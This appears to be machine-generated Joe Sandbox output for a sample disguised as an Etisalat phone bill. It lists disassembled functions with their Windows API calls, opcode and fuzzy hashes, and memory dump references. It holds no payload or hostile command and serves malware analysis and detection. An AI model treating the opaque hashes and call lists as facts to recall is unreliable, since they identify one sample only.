                                      • Instruction ID: cd48fbed58f8b583905ac3fc4fe5ee0be141ecdc7f6cca57f72d5a8f2576b9dd
                                      • Opcode Fuzzy Hash: f4924e3c2e014e6c0188ffa39177d79b0f737a50c278fe242175fbc458ef13da
                                      • Instruction Fuzzy Hash: 4A11E572904249ABC7119BB89C44FAF7BECEB45320F1442A9F915D7250D7718D4087B1
                                      Function 00BB874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00BB8766
                                      • GetLastError.KERNEL32(?,00BB822A,?,?,?), ref: 00BB8770
                                      • GetProcessHeap.KERNEL32(00000008,?,?,00BB822A,?,?,?), ref: 00BB877F
                                      • HeapAlloc.KERNEL32(00000000,?,00BB822A,?,?,?), ref: 00BB8786
                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00BB879D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                      • String ID:
                                      • API String ID: 842720411-0
                                      • Opcode ID: 901cd496f0d4d477eb1a33c7edec666bdc7bb04c42386063da0dfc2118013278
                                      • Instruction ID: c956001101ddb26eb80a1a894f76b491380e502b8f4f171df0854b0485b22f77
                                      • Opcode Fuzzy Hash: 901cd496f0d4d477eb1a33c7edec666bdc7bb04c42386063da0dfc2118013278
                                      • Instruction Fuzzy Hash: BF014B71600249EFDB204FA6DC88DBB7BACEF8A3957200569F949C7260DE718C00CA60
                                      Function 00BC54E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00BC5502
                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00BC5510
                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00BC5518
                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00BC5522
                                      • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00BC555E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                      • String ID:
                                      • API String ID: 2833360925-0
                                      • Opcode ID: 4c92c35533e77f6a61d07b151d7a0333d2a075558a63f9221082881dfb8a1595
                                      • Instruction ID: da1a32eaba0c021a281d2be77aff347fb5ae31429c5c5e3b71fb46bb459f81d5
                                      • Opcode Fuzzy Hash: 4c92c35533e77f6a61d07b151d7a0333d2a075558a63f9221082881dfb8a1595
                                      • Instruction Fuzzy Hash: D6010C35D05A1EDBCF109BE5E888BEDBBB9FB19711F41019AE501B6240DF306594C7A2
                                      Function 00BB7652 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BB758C,80070057,?,?,?,00BB799D), ref: 00BB766F
                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BB758C,80070057,?,?), ref: 00BB768A
                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BB758C,80070057,?,?), ref: 00BB7698
                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BB758C,80070057,?), ref: 00BB76A8
                                      • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BB758C,80070057,?,?), ref: 00BB76B4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                      • String ID:
                                      • API String ID: 3897988419-0
                                      • Opcode ID: aec527f32c7bd380ba907b2d2faaf0285568cc6a4d5efbac6122ae16c2d2e85f
                                      • Instruction ID: 25358a4ae1d670417eab5ea32189e5b8d88a93641757dfa50dff08c2f6c8b103
                                      • Opcode Fuzzy Hash: aec527f32c7bd380ba907b2d2faaf0285568cc6a4d5efbac6122ae16c2d2e85f
                                      • Instruction Fuzzy Hash: 08017172601605ABDB109F58DC84ABE7BEDEB85752F144068FD05D7211EF71DE409BA0
                                      Function 00BB85F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00BB8608
                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00BB8612
                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00BB8621
                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00BB8628
                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00BB863E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                      • String ID:
                                      • API String ID: 44706859-0
                                      • Opcode ID: c7601de0b12fdca76cd6aa5ee19453312cea57831f1b0f11b092d951ef811267
                                      • Instruction ID: f57ccad7646f086a65734584bef6e6191a5cceabcffc10d07ae4ad0183014688
                                      • Opcode Fuzzy Hash: c7601de0b12fdca76cd6aa5ee19453312cea57831f1b0f11b092d951ef811267
                                      • Instruction Fuzzy Hash: 27F06D31201245AFEB100FA5DCCDEBB3BACEF8A754B044569FA4ADB190CFB19C41DA60
                                      Function 00BB8652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00BB8669
                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00BB8673
                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00BB8682
                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00BB8689
                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00BB869F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                      • String ID:
                                      • API String ID: 44706859-0
                                      • Opcode ID: 65e7b05269dc1235df7de0b80977d67fe447757795b643321d012fc98389b78c
                                      • Instruction ID: 90412e05889c14d54840a0b59ce75c0a21479e63652c7fa8908cb7e323fd7cac
                                      • Opcode Fuzzy Hash: 65e7b05269dc1235df7de0b80977d67fe447757795b643321d012fc98389b78c
                                      • Instruction Fuzzy Hash: 05F04F71200245AFEB111FA5ECC8EB73BACEF8A754B100169F946DB1A0DEB19D41DA60
                                      Function 00BBC6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDlgItem.USER32(?,000003E9), ref: 00BBC6BA
                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00BBC6D1
                                      • MessageBeep.USER32(00000000), ref: 00BBC6E9
                                      • KillTimer.USER32(?,0000040A), ref: 00BBC705
                                      • EndDialog.USER32(?,00000001), ref: 00BBC71F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                      • String ID:
                                      • API String ID: 3741023627-0
                                      • Opcode ID: 96326cb399847733e3b7fdacb0712d7d76591730d33796952cce500145f05e18
                                      • Instruction ID: 08ecf4eb2204353347ad590738eb8dec055864e528c796bb93fddda36193440e
                                      • Opcode Fuzzy Hash: 96326cb399847733e3b7fdacb0712d7d76591730d33796952cce500145f05e18
                                      • Instruction Fuzzy Hash: E8014B30500705ABEB219B20DD8EFB67BB8FF00705F0006A9B686A64E1DFE4A954CA80
                                      Function 00B613B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                      Download Yara Rule
                                      APIs
                                      • EndPath.GDI32(?), ref: 00B613BF
                                      • StrokeAndFillPath.GDI32(?,?,00B9BAD8,00000000,?), ref: 00B613DB
                                      • SelectObject.GDI32(?,00000000), ref: 00B613EE
                                      • DeleteObject.GDI32 ref: 00B61401
                                      • StrokePath.GDI32(?), ref: 00B6141C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                      • String ID:
                                      • API String ID: 2625713937-0
                                      • Opcode ID: 1193c340fc4ace305dc4e6a246d8970b6427615b0f1ebc7e924730eceb24f812
                                      • Instruction ID: 7a071bc0e3117c74837770b6eff35d961709d5473ad00ec7a97bd52f40e45657
                                      • Opcode Fuzzy Hash: 1193c340fc4ace305dc4e6a246d8970b6427615b0f1ebc7e924730eceb24f812
                                      • Instruction Fuzzy Hash: AAF0E130014349EBDB219F1AEC4D7683FE5E701326F08C265E4294A5F1CB354596DF60
                                      Function 00BCC602 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 00BCC69D
                                      • CoCreateInstance.OLE32(00BF2D6C,00000000,00000001,00BF2BDC,?), ref: 00BCC6B5
                                        • Part of subcall function 00B67F41: _memmove.LIBCMT ref: 00B67F82
                                      • CoUninitialize.OLE32 ref: 00BCC922
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: CreateInitializeInstanceUninitialize_memmove
                                      • String ID: .lnk
                                      • API String ID: 2683427295-24824748
                                      • Opcode ID: 8ef980bcaf0ac0bd2e29a1a7f87d0a730c35931d0faa6860dbbe22f35d4e4948
                                      • Instruction ID: cbe4b098d28a488bd13a97aa6e5ddafe6b2d0d47c14c824e3264add7643b8e3f
                                      • Opcode Fuzzy Hash: 8ef980bcaf0ac0bd2e29a1a7f87d0a730c35931d0faa6860dbbe22f35d4e4948
                                      • Instruction Fuzzy Hash: CFA15C71108205AFD700EF54C891EABB7ECFF94704F0449ACF1969B1A2DB74EA09CB52
                                      Function 00B72E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B80FF6: std::exception::exception.LIBCMT ref: 00B8102C
                                        • Part of subcall function 00B80FF6: __CxxThrowException@8.LIBCMT ref: 00B81041
                                        • Part of subcall function 00B67F41: _memmove.LIBCMT ref: 00B67F82
                                        • Part of subcall function 00B67BB1: _memmove.LIBCMT ref: 00B67C0B
                                      • __swprintf.LIBCMT ref: 00B7302D
                                      Strings
                                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00B72EC6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                      • API String ID: 1943609520-557222456
                                      • Opcode ID: a38c432d8dd9f77a2377a92772109cbfbbc0a1fb9ea87e5ceb80c82e087fa4ab
                                      • Instruction ID: c76f11b31d8da00c2cebbaacefb858f1d56778692bb87ab10ba4d04f8f9d3d82
                                      • Opcode Fuzzy Hash: a38c432d8dd9f77a2377a92772109cbfbbc0a1fb9ea87e5ceb80c82e087fa4ab
                                      • Instruction Fuzzy Hash: AB917A711083019FCB28EF24D895D6EB7E8EF85B40F0449ADF4969B2A1DE34EE45CB52
                                      Function 00BCBBA6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B648AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B648A1,?,?,00B637C0,?), ref: 00B648CE
                                      • CoInitialize.OLE32(00000000), ref: 00BCBC26
                                      • CoCreateInstance.OLE32(00BF2D6C,00000000,00000001,00BF2BDC,?), ref: 00BCBC3F
                                      • CoUninitialize.OLE32 ref: 00BCBC5C
                                        • Part of subcall function 00B69997: __itow.LIBCMT ref: 00B699C2
                                        • Part of subcall function 00B69997: __swprintf.LIBCMT ref: 00B69A0C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                      • String ID: .lnk
                                      • API String ID: 2126378814-24824748
                                      • Opcode ID: 12a570be9d3da72b2cce78df2fcb8f7c0a27c81d0868e1f9ea13a86dc012eb0c
                                      • Instruction ID: 3df9e45a6c6a918380b030e4bfa514d29e5706047995b3f00a8c3389a0f66f81
                                      • Opcode Fuzzy Hash: 12a570be9d3da72b2cce78df2fcb8f7c0a27c81d0868e1f9ea13a86dc012eb0c
                                      • Instruction Fuzzy Hash: 44A122756043019FCB10DF14C485E6ABBE9FF89314F14899CF99A9B2A1CB31ED45CB91
                                      Function 00B8524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                      Download Yara Rule
                                      APIs
                                      • __startOneArgErrorHandling.LIBCMT ref: 00B852DD
                                        • Part of subcall function 00B90340: __87except.LIBCMT ref: 00B9037B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ErrorHandling__87except__start
                                      • String ID: pow
                                      • API String ID: 2905807303-2276729525
                                      • Opcode ID: cb9d75b407536ff574e44c3d3dda52e58a68a79dd67fe05672664d38ec4fb2b3
                                      • Instruction ID: 8497754b41bfb547c939744341f49a80b6eccc3431496c2fdb00233b4d5a674b
                                      • Opcode Fuzzy Hash: cb9d75b407536ff574e44c3d3dda52e58a68a79dd67fe05672664d38ec4fb2b3
                                      • Instruction Fuzzy Hash: 42515B21A2D6029BDF21BB24C94137E2BE4DB10750F2449F8E496823F6EE748CD4DB4A
                                      Function 00B8023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: #$+
                                      • API String ID: 0-2552117581
                                      • Opcode ID: 18cb51a5f844da246c36f10b8e66cd8f1e25521dfd1a68e9d703329fdbe730c5
                                      • Instruction ID: 1f401ae3184b244246666d4ec06fed5b51f4f8f9525ba06583d6cc820d351c12
                                      • Opcode Fuzzy Hash: 18cb51a5f844da246c36f10b8e66cd8f1e25521dfd1a68e9d703329fdbe730c5
                                      • Instruction Fuzzy Hash: 675124751046468FDF25EF28D488BFA7BE4EF19310F1841E5EC919B2A0DBB49C46C762
                                      Function 00B762F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: _memset$_memmove
                                      • String ID: ERCP
                                      • API String ID: 2532777613-1384759551
                                      • Opcode ID: 5418dbf0e9ce96bc64c6aadad7cddc762c99cc6a3a420f3354b4086e94aeda8c
                                      • Instruction ID: c9c86ba710b00d815bb9a271a6ad3ad5d4d39a85b28e7db5f6954eb33c1339ad
                                      • Opcode Fuzzy Hash: 5418dbf0e9ce96bc64c6aadad7cddc762c99cc6a3a420f3354b4086e94aeda8c
                                      • Instruction Fuzzy Hash: AE51A071900B099BDB24CF69C8917EABBF8EF04714F2085AEE55EDB251E771D984CB40
                                      Function 00BE7BB5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00BEF910,00000000,?,?,?,?), ref: 00BE7C4E
                                      • GetWindowLongW.USER32 ref: 00BE7C6B
                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00BE7C7B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Window$Long
                                      • String ID: SysTreeView32
                                      • API String ID: 847901565-1698111956
                                      • Opcode ID: df02e18d5f99a5f1909d4b0b0eefc830a27f4e21aaf2ba5899424103705ac070
                                      • Instruction ID: a786e9fd1369e05501d3ab056e90a24bc3d819cfb2cc872ca7521c56272afa38
                                      • Opcode Fuzzy Hash: df02e18d5f99a5f1909d4b0b0eefc830a27f4e21aaf2ba5899424103705ac070
                                      • Instruction Fuzzy Hash: 3F31DE31244286AFDB118F39DC41BEA77E9EF45324F204765F875932E0CB31E8519B60
                                      Function 00BE7648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00BE76D0
                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00BE76E4
                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00BE7708
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window
                                      • String ID: SysMonthCal32
                                      • API String ID: 2326795674-1439706946
                                      • Opcode ID: b256f48d3afd1f94a992596f847a211b587fb486a2dbc1cf145b26b9d3b57769
                                      • Instruction ID: 17600c5678f0a1f9333fe4d405bd8f399a326e2c3836aab195549e1697c825b5
